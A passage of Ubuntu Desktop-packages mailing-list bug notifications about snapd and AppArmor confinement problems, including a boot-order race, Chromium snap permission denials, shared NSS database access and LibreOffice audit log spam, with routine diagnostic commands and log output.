snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge + $ sudo snap connect test-snapd-pulseaudio:pulseaudio $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 - interface not being connecting which is unrelated to mediation. x11 is + interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install test-snapd-audio-record --edge $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Adding a snapd Ubuntu task, marking as In Progress and assigning to mvo since he is preparing a 20.04 upload. ** Also affects: snapd (Ubuntu) Importance: Undecided Status: New ** Changed in: snapd (Ubuntu Focal) Assignee: (unassigned) => Michael Vogt (mvo) ** Changed in: snapd (Ubuntu Focal) Status: New => In Progress ** Changed in: snapd (Ubuntu Focal) Importance: Undecided => High ** Changed in: snapd (Ubuntu Focal) Milestone: None => ubuntu-20.04 -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu. https://bugs.launchpad.net/bugs/1871148 Title: services start before apparmor profiles are loaded Status in AppArmor: Invalid Status in snapd: Fix Released Status in apparmor package in Ubuntu: Fix Released Status in snapd package in Ubuntu: In Progress Status in zsys package in Ubuntu: Invalid Status in apparmor source package in Focal: Fix Released Status in snapd source package in Focal: In Progress Status in zsys source package in Focal: Invalid Bug description: Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal: --- cannot change profile for the next exec call: No such file or directory snap-update-ns failed with code 1: File exists --- Updated to add for Jamie: $ snap version snap2.44.2+20.04 snapd 2.44.2+20.04 series 16 ubuntu 20.04 kernel 5.4.0-21-generic To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1871148/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Daniel, this is a different cause but same result: zfs-load-module.service (2ms) zfs-import-cache.service (8ms) zfs-import.target ... var-lib.mount (69ms) ... snap-multipass-1869.mount (1.358s) ... apparmor.service (279ms) ... In this case, apparmor correctly waited for var.lib.mount, but multipass started before apparmor.service completed. ** Also affects: snapd Importance: Undecided Status: New -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu. https://bugs.launchpad.net/bugs/1871148 Title: services start before apparmor profiles are loaded Status in AppArmor: Invalid Status in snapd: New Status in apparmor package in Ubuntu: Fix Released Status in zsys package in Ubuntu: Invalid Status in apparmor source package in Focal: Fix Released Status in zsys source package in Focal: Invalid Bug description: Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal: --- cannot change profile for the next exec call: No such file or directory snap-update-ns failed with code 1: File exists --- Updated to add for Jamie: $ snap version snap2.44.2+20.04 snapd 2.44.2+20.04 series 16 ubuntu 20.04 kernel 5.4.0-21-generic To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1871148/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Daniel responded on irc and said after several reboots with the new apparmor, everything was fine on every boot (though his critical-chain has var.lib.mount listed). My attached systemd-analyze plot svg shows that apparmor.service is indeed starting after var.lib.mount on the VM where the critical-chain didn't show it or zfs. On irc Didier thought that critical-chain would only list the longest path to apparmor.service starting and may not show everything (the man page isn't clear on this point IMHO). Based on all of this, I'm going to tentatively mark the zsys task back to Invalid. If people continue to see this bug, we can reopen as necessary (in which case it might be a systemd task for not generating the mount units/requires/after correctly/in a race-free manner or it might indicate zfs initialization is perhaps slow and apparmor.service is starting before var.lib.mount is generated (and therefore RequiresMountsFor is satisfied. Or it is something else ;) ** Changed in: zsys (Ubuntu Focal) Status: New => Invalid -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu. https://bugs.launchpad.net/bugs/1871148 Title: services start before apparmor profiles are loaded Status in AppArmor: Invalid Status in apparmor package in Ubuntu: Fix Released Status in zsys package in Ubuntu: Invalid Status in apparmor source package in Focal: Fix Released Status in zsys source package in Focal: Invalid Bug description: Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal: --- cannot change profile for the next exec call: No such file or directory snap-update-ns failed with code 1: File exists --- Updated to add for Jamie: $ snap version snap2.44.2+20.04 snapd 2.44.2+20.04 series 16 ubuntu 20.04 kernel 5.4.0-21-generic To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1871148/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
All that said, Daniel and Jean-Baptiste, I installed 20.04 in a vm and tried to reproduce this and could not. The apparmor change was about correctness of the unit so I performed the upload, but I also hoped that it would address the issue you are seeing. I'm not certain it will. On one boot, prior to upgrading apparmor, I saw: $ sudo systemd-analyze critical-chain apparmor.service The time when unit became active or started is printed after the "@" character. The time the unit took to start is printed after the "+" character. apparmor.service +11.135s └─local-fs.target @4.376s └─zfs-mount.service @4.327s +48ms └─var-lib-dpkg.mount @4.188s +137ms └─var-lib.mount @3.883s +250ms └─zfs-import.target @3.829s └─zfs-import-cache.service @3.125s +704ms └─zfs-load-module.service @3.121s +2ms └─systemd-udev-settle.service @1.183s +1.937s └─systemd-udev-trigger.service @933ms +248ms └─systemd-udevd-kernel.socket @886ms └─system.slice @535ms └─-.slice @535ms Note that var-lib.mount is already listed. On reboot though (without updating apparmor), I see: $ sudo systemd-analyze critical-chain apparmor.service The time when unit became active or started is printed after the "@" character. The time the unit took to start is printed after the "+" character. apparmor.service +101ms └─local-fs.target @2.812s └─run-user-122.mount @5.172s └─swap.target @1.823s └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.swap @1.799s +22ms └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.device @1.798s Oddly, no zfs entries are listed apparently because local-fs.target isn't pulling them in: $ sudo systemd-analyze critical-chain local-fs.target The time when unit became active or started is printed after the "@" character. The time the unit took to start is printed after the "+" character. local-fs.target @2.812s └─run-user-122.mount @5.172s └─swap.target @1.823s └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.swap @1.799s +22ms └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.device @1.798s Looking at var-lib.mount, I see zfs is in there: $ sudo systemd-analyze critical-chain var-lib.mount The time when unit became active or started is printed after the "@" character. The time the unit took to start is printed after the "+" character. var-lib.mount +179ms └─zfs-import.target @2.248s └─zfs-import-cache.service @1.845s +402ms └─zfs-load-module.service @1.840s +2ms └─systemd-udev-settle.service @692ms +1.143s └─systemd-udev-trigger.service @524ms +167ms └─systemd-udevd-kernel.socket @494ms └─system.slice @357ms └─-.slice @357ms So why after a reboot did the dependencies change and drop the /var/lib entry from local-fs.target? I then upgraded apparmor to have the RequiresMountsFor /var/lib/snapd/apparmor/profiles, rebooted and saw no difference: $ sudo systemd-analyze critical-chain apparmor.service The time when unit became active or started is printed after the "@" character. The time the unit took to start is printed after the "+" character. apparmor.service +222ms └─local-fs.target @2.562s └─run-user-122.mount @4.834s └─swap.target @1.687s └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.swap @1.663s +24ms └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.device @1.662s ** Changed in: zsys (Ubuntu Focal) Status: Invalid => New -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu. https://bugs.launchpad.net/bugs/1871148 Title: services start before apparmor profiles are loaded Status in AppArmor: Invalid Status in apparmor package in Ubuntu: Fix Released Status in zsys package in Ubuntu: New Status in apparmor source package in Focal: Fix Released Status in zsys source package in Focal: New Bug description: Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal: --- cannot change profile for the next exec call: No such file or directory snap-update-ns failed with code 1: File exists --- Updated to add for Jamie: $ snap version snap2.44.2+20.04 snapd 2.44.2+20.04 series 16 ubuntu 20.04 kernel 5.4.0-21-generic To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: snapd Status: In Progress => Fix Released ** Changed in: snapd (Ubuntu) Status: Triaged => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in AppArmor: Fix Released Status in snapd: Fix Released Status in apparmor package in Ubuntu: In Progress Status in chromium-browser package in Ubuntu: Invalid Status in snapd package in Ubuntu: Fix Released Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: apparmor Status: In Progress => Fix Released ** Also affects: apparmor (Ubuntu) Importance: Undecided Status: New ** Changed in: apparmor (Ubuntu) Importance: Undecided => Medium ** Changed in: apparmor (Ubuntu) Status: New => In Progress ** Changed in: apparmor (Ubuntu) Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in AppArmor: Fix Released Status in snapd: In Progress Status in apparmor package in Ubuntu: In Progress Status in chromium-browser package in Ubuntu: Invalid Status in snapd package in Ubuntu: Triaged Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Reassigning the snapd task to apparmor in Ubuntu since it has a patch to rc.apparmor.functions to look for /var/lib/snapd/apparmor/profiles but does not add it to RequiresMountsFor. ** Project changed: snapd => apparmor ** Changed in: apparmor Status: Confirmed => In Progress ** Changed in: apparmor Importance: Critical => Undecided ** Changed in: apparmor Status: In Progress => Invalid ** Also affects: apparmor (Ubuntu) Importance: Undecided Status: New ** Changed in: apparmor (Ubuntu Focal) Status: New => In Progress ** Changed in: apparmor (Ubuntu Focal) Importance: Undecided => Critical ** Changed in: apparmor (Ubuntu Focal) Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu. https://bugs.launchpad.net/bugs/1871148 Title: services start before apparmor profiles are loaded Status in AppArmor: Invalid Status in apparmor package in Ubuntu: In Progress Status in zsys package in Ubuntu: Confirmed Status in apparmor source package in Focal: In Progress Status in zsys source package in Focal: Confirmed Bug description: Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal: --- cannot change profile for the next exec call: No such file or directory snap-update-ns failed with code 1: File exists --- Updated to add for Jamie: $ snap version snap2.44.2+20.04 snapd 2.44.2+20.04 series 16 ubuntu 20.04 kernel 5.4.0-21-generic To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1871148/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1864127] Re: apparmor denies ~/snap/chromium/ writes
Seth, I suspect if you stop the snap and restart it, these errors will go away. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1864127 Title: apparmor denies ~/snap/chromium/ writes Status in chromium-browser package in Ubuntu: New Bug description: Hello, on focal with chromium from the snap package running I see a constant stream of apparmor denials: Feb 21 00:20:55 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000 Feb 21 00:20:55 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access" Feb 21 00:20:55 millbarge audit: CWD cwd="/home/sarnold" Feb 21 00:20:55 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:20:55 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:20:55 millbarge audit: PROCTITLE proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265 Feb 21 00:20:58 millbarge bash[4126190]: Fri, 21 Feb 2020 00:20:58 + src 46 (fix: 3) currently receiving: 0,1@0 0,13@0 0,15@0 0,17@0 0,19@0 0,24@0 0,30@0 1,133@0 1,138@0 2,1@1 2,9@1 2,18@1 2,21@1 2,26@1 3,23@0 3,27@0 3,28@0 Feb 21 00:21:05 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000 Feb 21 00:21:05 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access" Feb 21 00:21:05 millbarge audit: CWD cwd="/home/sarnold" Feb 21 00:21:05 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:21:05 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:21:05 millbarge audit: PROCTITLE proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265 Feb 21 00:21:15 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000 Feb 21 00:21:15 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsui
[Desktop-packages] [Bug 1864127] Re: apparmor denies ~/snap/chromium/ writes
$ aa-decode 2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C Decoded: /home/sarnold/snap/chromium/1026/.config/chromium/Default/Sync Data/SyncData.sqlite3-journal This sounds like perhaps the snap was refreshed while it was running. If so, it should be fixed with refresh-app-awareness in snapd, which is actively being worked on. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1864127 Title: apparmor denies ~/snap/chromium/ writes Status in chromium-browser package in Ubuntu: New Bug description: Hello, on focal with chromium from the snap package running I see a constant stream of apparmor denials: Feb 21 00:20:55 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000 Feb 21 00:20:55 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access" Feb 21 00:20:55 millbarge audit: CWD cwd="/home/sarnold" Feb 21 00:20:55 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:20:55 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:20:55 millbarge audit: PROCTITLE proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265 Feb 21 00:20:58 millbarge bash[4126190]: Fri, 21 Feb 2020 00:20:58 + src 46 (fix: 3) currently receiving: 0,1@0 0,13@0 0,15@0 0,17@0 0,19@0 0,24@0 0,30@0 1,133@0 1,138@0 2,1@1 2,9@1 2,18@1 2,21@1 2,26@1 3,23@0 3,27@0 3,28@0 Feb 21 00:21:05 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000 Feb 21 00:21:05 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access" Feb 21 00:21:05 millbarge audit: CWD cwd="/home/sarnold" Feb 21 00:21:05 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:21:05 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:21:05 millbarge audit: PROCTITLE proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265 Feb 21 00:21:15 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F5379
[Desktop-packages] [Bug 1859643] Re: [snap] cannot use shared NSS db
OTOH, I think it makes sense to allow for the ability to share ~/.pki/nssdb (and yes, a personal-files addition along with a snap change (perhaps just a symlink from $SNAP_USER_DATA/.pki/nssdb to ~/.pki/nssdb would be enough rather than patching?). For read access, I have no problem with using personal-files to read the nssdb into $SNAP_USER_DATA, with auto-connection. For write, chromium is not the clear owner of this directory, so I would be hesitant to recommend it as a default since IMO, chromium shouldn't be writing out to these files even in non-snap situations (again, perfectly reasonable to merge in changes if the user desires). I for one would be rather surprised to install a certificate via chromium and have it reflected in my session-wide nssdb for another application (eg, libvirt). Furthermore, there is nothing saying that nssdb might not change format incompatibly with nss in the chromium snap and software installed on the system. This is not theoretical: rather than using a single nssdb in the user's global ~/.pki/nssdb dir, firefox, for example, instead stores per-profile certN.db files in ~/.mozilla/firefox//* and in my profile dirs I have a mixture of cert8.db and cert9.db. I do see that chromium only has cert9.db, so perhaps this is handled by the library itself (again, someone would need to verify), but then there is nssdb skew if some applications are writing to certN-1.db, some to certN.db and others to certN+1.db. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1859643 Title: [snap] cannot use shared NSS db Status in chromium-browser package in Ubuntu: Triaged Bug description: (initially reported at https://askubuntu.com/questions/1202861 /chromium-does-not-show-certificates-from-pki-nssdb) Chromium can theoretically use the shared NSS db at ~/.pki/nssdb, but the snap confinement prevents it from actually using the shared db (it reads and writes to $SNAP/.pki/nssdb instead). Shared certificates can be inspected by browsing to chrome://settings/certificates. Really accessing the shared db would require an additional read/write personal-files plug on $HOME/.pki/nssdb, and patching GetDefaultConfigDirectory() in crypto/nss_util.cc. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1859643/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1849680] Re: audit spam in dmesg (libreoffice)
For the next libreoffice upload, the non-/home read-only accesses all look fine to add to the libreoffice profile. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libreoffice in Ubuntu. https://bugs.launchpad.net/bugs/1849680 Title: audit spam in dmesg (libreoffice) Status in libreoffice package in Ubuntu: New Bug description: My dmesg is getting flooded by apparmor audit messages, mostly from libreoffice (profiles libreoffice-soffice and libreoffice-oosplash): $ dmesg | tail -n 25 [13682.452555] audit: type=1400 audit(1571920851.001:3672): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [13682.453430] audit: type=1400 audit(1571920851.001:3673): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [13682.453933] audit: type=1400 audit(1571920851.001:3674): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/libdrm/amdgpu.ids" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [13682.455491] audit: type=1400 audit(1571920851.005:3675): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=17792 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000 [13682.604100] audit: type=1400 audit(1571920851.153:3676): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.local/share/gvfs-metadata/smb-share:server=buddha,share=chris" 